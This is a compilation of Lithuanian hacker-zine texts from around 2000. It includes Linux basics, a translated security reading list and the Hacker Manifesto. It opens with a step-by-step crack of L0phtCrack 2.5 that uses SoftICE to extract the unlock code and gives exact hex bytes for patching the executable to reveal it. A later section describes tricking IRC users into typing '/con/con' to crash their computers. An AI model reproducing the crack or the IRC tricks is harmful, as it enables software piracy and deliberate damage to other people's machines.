Uždraudžiame visų breakpointų (Bpx) naudojimą, t.y. parašome komandą BD *.Išeiname iš SoftICE (F5). Dabar teksto lauke „Unlock code:” parašome tai kąbuvome užsirašę. Pas mane buvo 6be3b311. Spaudžiame OK. Bingo! Pasirodo žinutė: “You have successfully registered L0phtCrack 2.5″. Tai reiškia, kad jūs sėkmingai užregistravote „L0phtCrack v2.5″. Bet ne visi turi SoftICE ir Disassembler, todėl jūs turite padaryti patchą. Tai bus programa kuri žinutės pavidalu parodo unlock kodą. Bet jūs dabar jau užregistravote programą, todėl eikite į windows „Start” meniu ir vykdykite komnadą „Run”, tada surinkite „regedit” (be kabučių). Atsiduriame programoje, kuri redaguoja windowz registrą. Einame į HKEY_CURRENT_USERSOFTWAREL0phtL0phtCrack ir ištriname „Registration” stringą. Dabar jau galima daryti patchą.

Patcho darymas:Einame į SoftICE(Ctrl+D). Surenkame komandą: Bpx MessageBoxA. Apie „Bpx” kalbėjau anksčiau, o apie „MessageBoxA” pakalbėsiu dabar. Tai yra standartinė API funkciją. Taigi mes su komanda „Bpx MessageBoxA” sustabdysime programą tada, kai ji vykdys šitą funkciją. Funkcija „MessageBoxA” išmeta žinutę. Dabar kur “Unlock code:” įvedame bet ką ir spaudžiame OK. Aktyvuojasi SoftICE. Mes esame procedūroje „MessageBoxA”, kad išeitume iš jos mes turime spausti 8 sykius F10, kai atsiranda žinutė OK ir dar 2 sykius F10 arba vieną sykį F11 ir OK (nežinaukas jums patinka labiau J). Mes išėjome iš procedūros. Štai ką matome:

…:0045662E 53 Push EBX:0045662F 57 Push EDI:00456630 FF7508 Push DWORD PTR [EBP+08]:00456633 FF75F4 Push DWORD PTR [EBP-0C]:00456636 FF150014D100 Call [User32!MessageBoxA]…

Parašome: Bpx 45662e (tai bus reikalinga vėliau).Dabar turime ieškoti seniau surasto unlock kodo (pas mane buvo 6be3b311).Rašome: d eax (Fuck!)d edx (Fuck!)d ebi (Fuck!)d ebp (Štai jis čia!)

Radome, kad jis registre EBP, bet jis dar ne jo pradžioje, taigi rašomed ebp+54 ir jis jau pradžioje. Jis randasi vietoje F7FBE4 (šešioliktainiskodas). Patchas vietoj žinutes: “You have entered an invalid code. Please tryagain”, parodys unlock kodą. Taigi mes turime tą žinutę perdirbti. Procedūra MessageBoxA susideda iš šių dalių:

Push 00Push <žinutės lango pavadinimas>Push <žinutė>Push 00Call MessageBoxA

Mes jau žinome, kad unlock kodas yra vietoje F7FBE4 (šešioliktainis kodas), bet mums dar reikia žinutės lango pavadinimo. Mes padarysime taip, uždarome programą L0phtCrack. Failą l0phtcrack.exe atsidarome su šešioliktainiu redaktoriumi ir ieškome pagal frazę: “You have entered an invalid code” (be kabučių). Atsirandame vietoje 83530 (šešioliktainis kodas). Šita žinutė pakeičiame žinute: “Unlock kodas yra:” (be kabučių) + 00 (tai parodo, kad žinutė užsibaigia toje vietoje). Visas šešioliktainis kodas atrodys taip: 55 6E 6C 6F 63 6B 20 6B 6F 64 61 73 20 79 72 61 3A 00. Neužmirškite išsaugoti failą! SoftICE žinutės vieta yra kitur. Kyla klausimas kur? Mes tiesiog turime prie 400000 pridėti 83530 (vieta faile) ir gausime 483530 (šešioliktainis kodas). Tai ir yra vieta SoftICE. Štai turime ir lango pavadinimą ir žinutę. Tai atrodo taip:

Push 00Push 483530Push F7FBE4Push 00Call MessageBoxA

Dar atsimenate anksčiau uždėta breakpointą Bpx 45662e? Štai čia mes ir įdėsime šitą žinutę. Vėl einame į L0pthCrack. Renkame kokį nors blogą unlocką! Aktyvuojasi SoftICE ties 45662e. Užsirašome apie aštuonis šešioliktainius kodus: 53 57 FF 75 08 FF 75 F4 Jie bus pažymėti ^^^^^^^^^^ (kad jums būtų aiškiau). Jie bus reikalingi ieškant vietos su šešioliktainiu redaktoriumi:

…:0045662E 53 Push EBX__________^^:0045662F 57 Push EDI__________^^ :00456630 FF7508 Push DWORD PTR [EBP+08]__________^^^^^^:00456633 FF75F4 Push DWORD PTR [EBP-0C]__________^^^^^^:00456636 FF150014D100 Call [User32!MessageBoxA]…

Dabar parašome komandą a (assembler). Spaudžiame klavišą enter ir parašome šias eilutes:

Push 00Push 483530Push F7FBE4Push 00Call MessageBoxANop

Baigia rašyti, spaudžiame klavišą „Escape”! Komanda nop reikalinga, kadangi sugadinome vieną komandą, nes naujai žinutei prireikė daugiau baitų. Komanda buvo nepilna, todėl mes ją panaikinonome (NOP reiškia nieką. Ji tiesiog nevykdoma). Jeigu šito būtume nepadarę būtume sugadinę programą ir ji butų neveikusi!

Pakeistas kodas su SoftICE:

:0045662E 6A00 Push 00:00456630 6830354800 Push 483530:00456635 68E4FBF700 Push F7FBE4:0045663A 6A00 Push 00:0045663C E898D2B0BF90 Call USER32!MessageBoxA:00456641 90 Nop

Pabaiga:Dabar jau užsirašome visus pakeistus eilučių šešioliktainius kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Išeiname iš SoftICE ir L0phtCrack. Einame į šešioliktainį redaktorių. Faile ieškome pagal tuos aštuonis anksčiau užsirašytus kodus: 53 57 FF 75 08 FF 75 F4 ir nuo tos vietos pakeičiame į pakeistus kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Tai ir yra mūsų patchas. Dabar paleidžiame L0phtCrack ir einame surinkti unlock. Spaudžiame OK ir matome žinutę: „Unlock kodas yra:” XXXXXXXX (X yra bet koks simbolis). Spaudžiame OK ir renkame matytą kodą. Vėl atsiranda ta pati žinutė. Paspaudžiame OK ir mes jau užsiregistravę J. Taigi dabar mes turime nupachintą l0phtcrack.exe failą, bet toks failas yra didelis ir tik pas jus, todėl mes turime padaryti programa, kuri automatiškai, tą EXE failą nupatchintų. Tam ir reikalinga pradžioje minima programa „UCOL Patch Maker”. Ar dar atsimenate, kad iš pat pradžių l0phtcrack.exe nukopijavote į saugią vietą? Taigi jūs turite ogiginalų ir nupatchintą failus, o ką toliau reikia daryti žiūrekite į programos „UCOL Patch Maker” aprašymą!

26. Linux tutorialas naujokams

1. Ka daryti jei uzmirsau r00t passworda? 2. Ismok parasyti shell scriptus

1. Ka daryti jei uzmirsau r00t passworda?

Karta kol buvau didelis Linux newbie atsitiko vienas dalykas: uzmirsau r00t passworda. O kitaip gauti r00t teisiu nejo/nemokejau, tad teko perinstalioti visa linux. Kad ir jums nereiktu del to vargti papasakosiu, kaip gauti r00t teises kompiuteryje: Ijungus kompiuteri islenda lilo raginimas pasirinti OS. Jus iveskite linux labeli ir po tarpo parasykite raide ‘S’. Tada linuxsas krausis single mode rezimu, o uzsikroves duos jums shell`a su r00t teisemis. Tada galesite pakeisti slaptazodi su ‘passwd’ komanda.

2. Ismok parasyti shell scriptus

Kartais schell skriptai arba aplinkos scenarijai sutrumpina jusu darbo laika. Jie gali vykdyti tam tikra komandu seka, t.y. automatizuoti tavo darba. Kaip rasomi sie skriptai? Pirmoje eiluteje rasomas ‘#!’ ir pilnas shell interpretatoriaus pavadinimas t.y. pavadinimas su keliu. Pvz. #!/bin/bash po to rasomos komandos kurias alikines scriptas. PVZ. Nr. 1: #!/bin/bash #viskas kas prasideda ‘#’ yra komentarai #Sis skriptas demonstruoja kaip prieiti prie skripto argumentu #Suzinoti savo uid ir username

#echo -spausdina kintamaji, eilute i STDOUT echo “Skripto pavadinimas:” $0 echo “Pirmas argumentas :” $1 echo “Antras argumentas :” $2 user=`id -un`; #ivykdo id -un ir isvesti perduoda kintamajam $user uid=`id -u`; echo “Username: ” $user echo “uid: ” $uid ###### End Of Script Nr. 1 #########

PVZ. Nr. 2: #!/bin/bash #viskas kas prasideda ‘#’ yra komentarai #Skriptas demonstruoja salygini sakini if if [ -d /etc/httpd ] # -d tikrina ar failas yra katalogas then echo “tu turi instaliaves apache ar kita www serveri” else echo “gali buti, kad jus neturite jokio www serverio” fi # kas sake kad programuotojai be humoro jausmo ###### End Of Script Nr. 2 #########

PVZ. Nr. 3: #!/bin/bash #viskas kas prasideda ‘#’ yra komentarai #demonstruoja cikla while while read Line; #skaito is STDOUT eilute do echo $Line; #ja spausdina done #skriptas dirba panasiai kaip komanda cat ###### End Of Script Nr. 3 #########

PVZ. Nr. 4: #!/bin/bash #viskas kas prasideda ‘#’ yra komentarai #demonstruoja kaip valdyti telnet ar pan… telnet host 21 << EOF #konektinas su host kompu per 21 porta qoute user FTP #siuncia useri qoute pass email@email.dom #pasworda MKDIR /same/dir #kuria dorektorija qoute quit #atsisveikina su ftpd ir baigia darba EOF ###### End Of Script Nr. 4 #########

27. Laikinas LINUX tinklas namie

From harlequin@fnord.org.uk Tue Jun 20 12:25:18 2000Newsgroups: alt.2600,alt.2600.hackerz,alt.hacker,alt.hackingSubject: HowTo: Makeshift Linux Network @ Home ..From: Harlequin Date: Tue, 20 Jun 2000 10:25:18 GMT

[Nuo VisiGoth:

1.Šita žinutė buvo perdyota Quinny 12.30.98 neribotam laikui.

2.Šitą žinutė paskelbė Osiris prieš kurį laiką (galbūt prieš pusantrų metų???) ir nuo to laiko jos daug kas ieškojo, bet niekas daugiau jos nepaskelbė, net pats Osiris, tad aš radau laiko paskelbti ją iš naujo kiekvienamm, kuris jaučia, kad jos reikia, nes aš manau, kad tai yra -labai- gera žinutė ir ji -turi- būti perskaityta kiaurai išilgai.]

%%%%%%%%

1. Gauk Linux arba FreeBSD ASAP

2.Įsigyk vieną arba daugiau knygų, parašytų Spaffordo, Bellovino, Cheswicko,Rubino arba Ranumo.

3.Gauk tiek Camelio, tiek Llamos knygas apie Perl

4.Gauk ORA knygą apie TCP/IP

5.Nusipirk keletą senų kompų (386/486) ir instaliuok tinklo plokštes. Apsiginklavęs šitais daikčiukais sukonstruok mažą UNIX tinklą savo namuose (arba garaže). Jei pasirinksi LINUX, perskaityk visus HOWTO, ypatingai tinklų HOWTO. Sukurk bent 5 vartotojų akauntus, leisdamas bent jau šelo priėjimą iš kiekvieno akaunto kiekviename kompe. Kai viskas bus sukonfigūruota (tinklas yra ir veikia), pabandyk (kaip skirtingas varotojas) įsilaužti į vieną ar kelis kompus tinkle. (Tu turėtum idealiai atakuoti įvairius servisus, ne tik kokį nors vieną.)

Taipogi: parsisiųsk SAFEsuite demo, seną ISS arba SATAN. Leisk šitas utėles prieš savo sistemą ir perskaityk tutorialus, kurie yra pridėti prie šitų utėlių dokumentacijos.

Toliau, gauk visus įrankius iš šito URL:http://www.giga.or.at/pub/hacker/unix

Išmok kiekvieną iš jų naudoti. Toliau, gauk AUSCERT UNIX saugumo sąrašą iš:ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist

Toliau, gauk UNIX saugumo sąrašą iš:http://stimpy.cac.washington.edu/~dittrich/R870/security-checklist.html

Toliau, gauk Site Security Handbook (RFC 1244) iš:http://stimpy.cac.washington.edu/~dittrich/R870/rfc1244.txt

Toliau, gauk šitą dokumentą iš SRI:http://stimpy.cac.washington.edu/~dittrich/R870/SRI-Whitepaper.ps

Po to, kai perskatysi ir suprasi visą aukščiau išdėstytą dokumentaciją (ir išbandysi kai kuriuos arba visus minimus įrankius, perskaityk šituos dokumentus:

Intrusion Detection Checklist:ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist

Dan Farmer’s Survey on Various Hosts:http://www.trouble.org/survey/

Improving the Security of Your Site by Breaking Into it:http://www.trouble.org/security/admin-guide-to-cracking.html

Visą popierizmą šitam saite, bet ypač Nancy Cook ir jos partnerio darbą:http://www.trouble.org/security/auditing_course/

Murphy’s law and computer security by Wietse Venema:http://www.trouble.org/security/murphy.html

Po to kai absorbuosi ir šią informaciją, ieškok šitų popierių:CIAC-2308_Securing_Internet_Information_Servers.pdf:http://ciac.llnl.gov/ciac/documents/CIAC-2308_Securing_Internet_Information_Servers.pdf

Securing X Windows:http://ciac.llnl.gov/ciac/documents/CIAC-2316_Securing_X_Windows.pdf

How to Detect an Intrusion:http://ciac.llnl.gov/ciac/documents/CIAC-2305_UNIX_Incident_Guide_How_to_Detect_an_Intrusion.pdf

Galiausiai, eik čia ir studijuok kiekvieną skylę, minimą BUGTRAQ archyve:http://www.geek-girl.com/bugtraq/search.html

Kiti tau labai padėsiantys dalykai:

1.Užsiprenumeruok visas žinutes apie UNIX saugumą, pvz.BUGTRAQ,CIAC, CERT ir t.t.

2.Iš šitų sąrašų susidaryk žinomų saugumo ekspertų (pvz.Farmerio, Venemos, Spaffordo,Ranumo ir kitų) emailų adresų duomenų bazę.

3.Šniukštinėk Internete bet kokių jų emailų apraiškų – sąrašuose, diskusijų grupėse ar tiesiog webe. (Dėmesio! Nebandyk nervinti šitų vaikinų, tiesiog perskaityk jų mintis ir idėjas, absorbuok jas ir judėk toliau).

4.Kai tu susidursi su exploitų kodu (o tu būtinai susidursi), paminėtu sąrašuose, sukompiluok ir įvykdyk jį. Užsirašyk rezultatus. (Viena gera priežastis instaliuoti LINUX ar FreeBSD: visi kompiliatoriai yra nemokami ir per pilną instaliaciją jau gerai sukonfigūruoti).

5.Pabandyk praleisti bent po valandą į dieną studijuodamas soketų programavimą.

6.Nueik į naudotų knygų knygyną ir nusipirk kiekvieną knygą apie sistemų administravimą. Bent jaunusipirk knygas, nukainuotas labai stipriai. Kuo pigesnės, tuo geriau.

7.Nežvenk, nes šitų kalbų pradmenys tikrai daug padės:A. PERLB. AWK/GAWK/NAWKC. SEDD. Expect

Taipogi pagelbėtų lentelė, kurioje būtų skirtumai tarp panašias ar identiškas užduotis, atliktas sh/bash/csh. Be to, jums turėtų būti įdomu paieškoti skirtumų tarp skirtingų UNIX versijų. Verta nusipirkti senų AIX, HP-UX, Unicos, IRIX, Data General, SunOS, Solaris, XENIX, SYS V ir t.t. instrukcijų. Žemiau esantis knygų sąrašas taipogi galėtų tau padėti. (Jos surašytos abėcėlės tvarka, ne pagal patikimą. Asmeniškai, aš rinkčiausi knygas, minėtas aukščiau.)

Building Internet FirewallsD. Brent Chapman, Elizabeth D. Zwicky (1995)ISBN: 1565921240

Commonsense Computer Security: Your Practical Guide toInformationProtectionMartin R. Smith (1994)ISBN: 0077078055

Computer Crime: A Crimefighter’s HandbookDavid J. Icove, David, Seger, Karl Icove, Karl A. Seger, Vonstorch(1995)ISBN: 1565920864

Computer SecurityJohn M. Carroll (1996)ISBN: 0750696001

Computer Security BasicsDeborah Russell, G.T. Gangemi (1991)ISBN: 0937175714

Computer Security HandbookArthur E. Hutt, Seymour Bosworth, Douglas B. Hoyt (1995)ISBN: 0471118540

Firewalls and Internet Security: Repelling the Wily HackerWilliam R. Cheswick, Steven M. Bellovin (1994)ISBN: 0201633574

Fundamentals of Computer Security TechnologyEdward G. Amoroso (1994)ISBN: 0131089293

Hacker Proof: The Ultimate Guide to Network SecurityLars Klander, Edward J. Renehan (1997)ISBN: 188413355X

Halting the Hacker: A Practical Guide to Computer SecurityDonald L. Pipkin (1997)ISBN: 013243718X

Information Warfare : Chaos on the Electronic SuperhighwayWinn Schwartau (1996)ISBN: 1560251328

Internet Firewalls and Network SecurityChris Hare, Karanjit S. Siyan (1996)ISBN: 1562056328

Internet Firewalls and Network SecurityKaranjit, Ph.D. Siyan, Chris Hare (1996)ISBN: 1562054376

Internet Security: Professional ReferenceDerek Atkins, Tom Sheldon, Tim Petru, Joel Snyder (1997)ISBN: 156205760X

Maximum Security: A Hacker’s Guide to Protecting Your Internet Site andNetworkAnonymous (1997)ISBN: 1575212684

Personal Computer SecurityEdward Tiley (1996)ISBN: 1568848145

Practical Unix and Internet SecuritySimson Garfinkel, Gene Spafford (1996)ISBN: 1565921488

Protecting Your Web Site With FirewallsMarcus Goncalves, Vinicius A. Goncalves (1997)ISBN: 0136282075

Protection and Security on the Information SuperhighwayFrederick B. Cohen (1995)ISBN: 0471113891

Secrets of a Super HackerKnightmare, the Knightmare (1994)ISBN: 1559501065

Security in ComputingCharles P. Pfleeger (1996)ISBN: 0133374866

Web Commerce CookbookGordon McComb (1997)ISBN: 0471196630

Web Security SourcebookAvi Rubin, Daniel Geer, Marcus J. Ranum, Aviel D. Rubin, Dan Geer (1997)ISBN: 047118148X

Web Security & Commerce (Nutshell Handbook)Simson Garfinkel, Gene Spafford (1997)ISBN: 1565922697http://www.amazon.com/exec/obidos/ISBN=1565922697/t/0560-5831826-082656

Access Control and Personal Identification SystemsDan M. Bowers (1988)ISBN: 0409900834

Internet Security SecretsJohn R. Vacca. (1996)ISBN: 1-56884-457-3

Network and Internetwork Security: Principles and Practice.William Stallings. (1995)ISBN: 0-02-415483-0

Network Security: How to Plan for It and Achieve It.Richard H. Baker. (1994)ISBN: 0-07-005141-0

UNIX Security for the Organization.R. Bringle Bryant. (1994)ISBN: 0-672-30571-2

UNIX Security: A Practical Tutorial.N. Derek Arnold.ISBN: 0-07-002560-6 (1993)

UNIX System Security: How to Protect Your Data and Prevent Intruders.Rick Farrow. (1991)ISBN: 0-201-57030-0

UNIX System Security Essentials.Christoph Braun and Siemens Nixdorf. (1995)ISBN: 0-201-42775-3

UNIX System Security.David A. Curry. (1992)ISBN: 0-201-56327-4

UNIX Unleashed. 1994Susan Peppard, Pete Holsberg, James Armstrong Jr., Salim Douba, S.LeeHenry, Ron Rose, Richard Rummel, Scott Parker, Ann Marshall, RonDippold, Chris Negus, John Valley, Jeff Smith, Dave Taylor, SydneyWeinstein and David TillISBN: 0-672-30402-3.

Galiausiai tau prireiks gerų įrankių eksperimentavimui. Juos rasi čia:http://ciac.llnl.gov/ciac/SecurityTools.html

Pradžiai tau to turėtų užtekti. Tau nebūtina viską išmokti per vieną kartą.Be abejo, firma, siūlanti tau darbą, nesitiki neįmanomo. Visgi UNIX saugumas yra besivystanti ir sudėtinga sritis. Tu neįvaldysi jos per vieną kartą. Idėja tokia: išsiaisškink senas problemas, kad kai išlįs naujos, tu žinosi jų pagrindus ir kilmę.

Pagrindinė priežastis, dėl kurios vertėtų kurti tinklą savo garaže, yra ta, kad tu turėsi šansą viską suknisti be didesnių pasekmių. Be to, tu simuliuosi mikrotinklą, galėsi žiūrėti logus ir atsakymus tiek iš atakuotojo, tiek iš aukos pusės. Tai yra labai vertinga, nes tai padės tau pasiruošti staigiai atpažinti problemą vien tik peržiūrėjus logus. Svarbiausios sritys, kuriose tau reikėtų pasikaustyti:1. NFS2. R servisai3. Slaptažodžiai – aktyvūs slaptažodžių tikrintojai, bendros žinios apie DES, krekinima ir t.t.4. Spūfinimas (spoofing)5. Maršrutizavimas (routing)6. Ugnies sienos (firewallai)7. CGI (jeigu web serveriai yra integruota to tinklo architektūros dalis).

Rekomenduotina gauti TIS Firewall Toolkitą kai tik būsi pasirengęs. (Nors aš manau, kad firma, kuri tave samdys, labiau domėsis vietiniu saugumu negu nuotolinėmis problemomis. Šiaip ar taip, tai padaryti verta).

Išvertė Winter Wolf (c) Y2K

28. HACKERIO MANIFESTAS

Shiandien jie sueme dar viena. Tai – visuose laikrashciuose.“Kompiuterinis nusikaltimas, Areshtuotas tineidzheris”, “Suimtashackeris isibroves i banka” …Prakeikti vaikiai. Visi jie vienodi.Bet ar jus, su savo trydalia psichologija ir 1950tuju technosmegenim,bandete kada nors pazhvelgti hackeriui uzh akiu? Ar norejote zhinoti,kodel jis yra toks koks yra, kokios jegos ji suformavo?Ash hackeris, ieikit i mano pasauli… Shis pasaulis prasidedamokykloj… Ash gudresnis nei kiti, o tai, ko mus moko man jauikyrejo. Prakeitas nenaudelis. Visi jie vienodi. Ash vyresnieseklasese, klausydamas kai mokytojas penkiolikta karta aishkina apietrupmenos prastinima. Ash suprantu tai. “Ne, ponas Smitai, ashnerodysiu savo darbo, ash padariau tai mintinai…” Prakeiktasvaikis. Tikriausia nusirashe. Visi jie vienodi.Shiandien ash padariau atradima. Ash atradau kompiuteri. Pala, pala…tai yra geras! Jis daro tai, ko ash ish jo noriu. Jeigu jis suklysta,tai tik del to, kad ash kazhka sumaishiau. Ne del to, kad jis manesnemegsta… ar bijo manes… ar mano kad ash gudri subine…Ar nemegsta mokyti ir neturetu buti cia…Prakeiktas vaikis. Viska, ka jis daro – tik zhaidimus zhaidzhia.Visi jie vienodi.Ir shtai tai atsitinka… Durys i pasauli atsiveria… Elektroninisimpulsas skuba telefono linijom, kaip heroinas narkomano venomis.Ash pagaliau radau prieglauda nuo kasdieninio neishmanelishkumo,ash atradau BBS’a. “Shtai ir yra tai… tai kur ash priklausau..”Ash pazhistu cia kiekviena… netgi jei ash niekad nebuvau jusutikes… niekad su jais nekalbejau ir galbut niekad daugiau apiejuos neishgirsiu… Ash pazhistu jus visus….Prakeiktas vaikis. Vel uzhima telefono linija. Visi jie vienodi.Taip, subingalvi, visi mes vienodi. Mokykloje mus ish shaukshteliomaitino vaikishku pienu, kai buvome ishalke gero bifshtekso…tie mesos kasneliai, kuriuos jus leidote mums praryti buvo sukramtytiir beskoniai. Mes buvom priklausomi nuo sadistu ir ignoruojamiabejinguju. Tie, kurie ishtikruju turejo ko mokyti, laike mus daugzhadanciais mokiniais, bet tie keli buvo kaip vandens lashasdykumoje…Dabar tai musu pasaulis… elektronu ir komutatoriu, baud’o grozhiopasaulis.Mes nemokame uzh paslaugas, kurios butu pigios, jei nebutukontroliujamos spekuliuojancziu apsirijeliu, ir jus vadinate musnusikalteliais. Mes tyrinejam… ir jus vadinate mus nusikalteliais.Mes egzistuojame be odos spalvos, be tautybes, be religiniunusistatymu… ir jus vadinate mus nusikalteliais.Jus konstruojate atomines bombas, jus kurstote karus, jus zhudote,sukciaujate ir meluojate mums, bandydami mus itikint, kad tai musupaciu labui, o mes vis dar nusikalteliai.Taip, ash nusikaltelis. Mano nusikaltimas yra smalsumas. Manonusikaltimas yra tai, kad ash vertinu zhmones pagal tai, ka jie sakoir galvoja, o ne pagal tai, kaip jie atrodo.Mano nusikaltimas yra tai, kad ash protingesnis uzh jus, tai, ko jusman niekad neatleisite.

Ash hackeris, ir tai mano manifestas. Jus galit sustabdyti viena,bet jus negalit sustabdyti musu visu. Juk kaip ten bebutu, visi mesvienodi.

+++The Mentor+++

——————————————————Verte Meshkutiz Grizlius & M.Mazhvydas, ish‘HACKERS MANIFESTO’ by The Mentor——————————————————

29. mIRC bug’s

Shtai keli budai kaip apgauti lamerius padariusiu takeover! kokiame nors jusu kanale:1.Galite apsimesti reklamos agentu sakydami : “Sveikas jei nori waru takeoveriu ir viso kito ateik i kanala #6,0”, kai jis parashys /j 6,0 ar /j #6,0 ir paliks visus kanalus iskaitant ir tavo! Zhodzi ureikia lameri priversti parashyti /j 6,0 tada jis paliks kanala! Zhodziu netures opo!2.Gali pasakyti dar ka : “Sveiki ash esu botas eggdropas del papildomu komandu rashykite /con/con”, jei jis parashys tai jis jau skaitykite atgavote kanala, lameriukas dabar perkrauti kompa turi! (Taip jam ir reikia)

3. Dar vienas geras budas pamokyti lamerius(takeoverintojus) – jei sako kad nori opo, jam sakyk rashyk /server op #hakeriai ir jam geraj nesibaigs, nes jis jau ***Lamer has quit IRC!!!!Realiai shi komanda pakeichia serverius pvz jei jis parashytu /server irc.is.lt jis tik jungtusi prie jo… O musu kietajam hakeriu vien zhodis /server ka reishia!!!! =]

Nu bet atsiminkite kad shie budai veikia tik totaliems neishmaneliams!

NU tiek Craft[Eye] – CraftEye@gmx.net

30. mIRC invisibility

2000.10.26 (c) J-azz*Life iz sux**Telekomaz Must die**J-azz iz Alive*He110, everybody… na ka kadangi zhiuriu kazhkajp visi aptilo su txt’u rashymu,taj sakau gal man rejkia pagelbet…Ajshq shis textaz yra skirtaz TIK 🙂 mokymo tixlamz ir ash jokioz atsakomybezneprisiimu. Ir uzh skajtytojo vejxmuz neatsakau…Texte vartojami ishsirejshkimaj neatitinka lietuviu kalboz normu.Taj ka vazhiuojam? oky-doky..

31. mIRC’o slaptybez

(Pagal “Efektivnij Hacking” by Aleksej Petrovskij, Boris Leontjev)*Ivadaz*Taj ka bichiuli atsibodo paprastaj bazarint ir kabint panaz, kurioztik slepdamosi uz monitoriauz atrodo kjetoz? 0 susitikuz neishtrauki nejzh0dzhi0… hmmmm.. That’z n0 c00l? I kn0w, I kn0w… Na ka pradedam su rimtesniaizdalykajz… na chia shitam txt’e, nebus njeko tokio kazhko ypatingo,bet… svarbu info.. ania? Lekjam toliau, atsidaryk alauz ir skaityk..*Tapk nematomaz*Na chia tox dalykaz kaip nematomumaz. Ivykdome komanda:/mode $me +iPaprasta? Ir kas tau ish to? Na gi nieko ypatingo, tu tapaj nematomas visjemz qrienezhino tavo tixlaus nick’o.. ir be to negales taves rast pagal Userid(dalis tavoy-mail’a iki simbolio @), bej bandydami su komandom /who arba /namesNaujausiose IRC versijose taj jau gali ijungti ir lange Setup uzhdedamaz varnele antInvisible Mode Ajshq, jei uzhejsi i kanala tu tapsi matomu(matysis nick’az)…*Komanda /who*Pakankamaj galinga pajeshkoz komanda yra /who, pagal kokia nors jau zhinoma informacija.Ir kazhkodel taj apie taj nej zhodzhiu neuzhsiminta mIRC’o Help’e(Pac netikrinau artikraj nera, pasitikiu shaltiniu). Naudodami komanda/whois LamerMes dazhniausiai gaunam kazhka panashaus i taj: Lamer ~qrutaz@takas.mustdie.lt * cool Lamer on #lamerland #qrutajLamer using irc.omnitel.net[193…..]OmnitelizEnd of /WHOISKomanda /who lejdzhia daryti pajeshka pagal mums jau zhinoma dali, pvz. Real Name, Userid… etc. pvz:mes jeshkom kahzko ish Marijoz zhemez:/who *.lt* arba tu jau bendravaj su Lamer’iu ir nori ji rasti vel:/who *qrutaz*arba/who *cool*Tajp gali rasti ir tave jei nesinaudosi nematomumu.*ThE EnD*Taj tjek apje IRC 2night… CULP.$.Jei bus dar alauz ir merdzhinu, taj bus dar ir textu.. ;)[Njeko nekejsdami galite lajsvaj platinti]P.$.$.4 more info check me out on Internety-mejl: J-azz@centras.lt

32. NAMEZERO

Namezero.com Uzhejes i tikrai shaunu saita UID0 pamachiau straipsni apie Namezero baneriu panaikinima… Tikrai idomus faktas apie tai, kad namezero baneriai yra sudaryti ish papraschiausiu frame’u. SaTaN sugalvojo buda, kuris nukilina namezero frame’a. Atrodytu butu viskas labai shaunu, bet su nukilintu frame’u dingsta ir jusu domenas narshykles adress bare (ten lieka jusu tikrojo puslapio adresas.). nemanau, kad tai tenkina mus, todel yra ir kitas budas. ish pradzhiu pasidarome www.namezero.com accounta. Savo accounto viduje rasi skiltele “Home Page”. Ten yra nustatomas tikrasis jusu domeno adresas “Actual URL”, Keyworday “Keywords” ir Aprashymas “Description”.i actual URL bei KeyWords rashykit ka tik norit. Mus reikia butent descriptnion, kurio textas naudojamas banerio fraime. Shtai ka jums teks ten irashyti: “>

33. Linux Naujokams

Trumpas Linux totorial`as naujokams

Turinys:1. Kas yra Linux?2. Kodel atsirado Linux?=-3. Linux instaliavimas4. Linux komandos5. Linux konfiguravimas6. Kas yra Xwindows?

1. Kas yra Linux?

Linux yra Unix tipo operacine sistema, skirta tinklo kompiuteriams (aisku gali buti ir ne tinklo kompiuteriuose). Linux yra registruotas prekinis zenklas Linus’o Torvalds’o (Linus Torvalds) operacines sistemos, kurios branduoli jis (su draugais) parase 1991 metais. Linux daugiaprogramine (multitasking) ir daugiavartotojine sistema. Kiekvienas vartotojas turi atskiras teises. Linux yra gan saugi OS. Linux yra pirmoji operacine sistema parasyta uz JAV ribu.

2. Kodel atsirado Linux?

Seniau Unix tipo operacines sistemos buvo gan brangios ir buvo sunku gauti jos pradinius kodus arba nebuvo ju galima keist. Tad vienas studentas suomis, Linus Torvalds sugalvojo parasyti savo operacines sistemos branduoli, kuris butulaisvai platinamas, butu galima keisti jo pradinius kodus ir t.t. Tad X-o desimtmecio pradzioje pasaulis isvydo nauja OS, kurios branduoli sudare 10 000 Linus`o parasytu C kalbos eiluciu. Kiekvienas galejo laisvai gauti sio branduolio koda, kiekvienas galejo ji tobulinti, taisyti klaidas. Ir stai- greitai Linux populiarumas pradejo augti. Vis dazniau ji imta naudoti serveriuose. Daugelis programuotoju ja tobulina. Beje, visa tai jie daro dykai, savo ir kitu labui.

3. Linux instaliavimas

Patarimas: jei jus norit tureti be Linux savo kompiuteryje ir windows- pirmiau instaliuokite windows (nepamirskit palikti atskira skirsni Linux), o poto Linux.Visu pirma norint instaliuoti Linux, reikia apsispresti kokia Linux distribucija instaliuosite. Ju yra daugelis: Debian, RedHat, Open Linux, Mandrake, SlackWare ir kt. Jos skiriasi savo programu paketais ir siektiek savo konfiguravimu. RedHat dazniausiai naudojama pradedanciuju, nes joje yra rpm- greitas, patogus programu instaliavimo budas.Apsisprendus kokia distribucija naudosit reikia is Linux CD pasidaryti pakrovimo diskeli (dazniausiai su programa rawrite.exe).Instaliavimas pradedamas uzkrovus kompiuteri is to diskelio. Tada reikia nurodyti is is kur instaliuosite (kieto disko, tinklo, cdrom), kokia kalba naudosite, kokia klavetura turite ir pan.Linux`ui skirtingai nei MS-DOS, windows reikia ne vienos particijos, o maziausiai dvieju: root particijos ir swap particijos. root particijoj laikomas Linux branduolys ir kiti jam reikialingi failai. swap particija naudojama laikiniems failams kuriti, taip kaip windows`u swap failas. Swap particija geriausiai kutri dvigubai didesni nei jusu RAM kiekis. Tada kompiuteris gales vykdyti programas kurioms reikia daugiau atminties negu jusu RAM. Jei jus instaliuosite Linux tik i sias dvi particijas jusu sistema bus tarsi skardineje. Norint kad taip nebutu reikia sukurti daugiau particiju: /home, /tmp, /usr. /home particijoj saugomi visi vartotoju failai, tad jo dydis priklauso nuo vartotoju skaiciaus ir ju poreikiu. /tmp particija panaciai kaip ir swap particija laiko laikinus failus. Skirtumas tas kad tmp particijoje laikomi paciuprogramu laikini failai, o ne branduolio (kernel). /usr particijoje saugoma visos nesistemines programos, bei kiri joms skirti failai. /usr particijos dydis priklauso nuo vartotoju reikalingu programu, bet is patirties zinau kuo daugiau 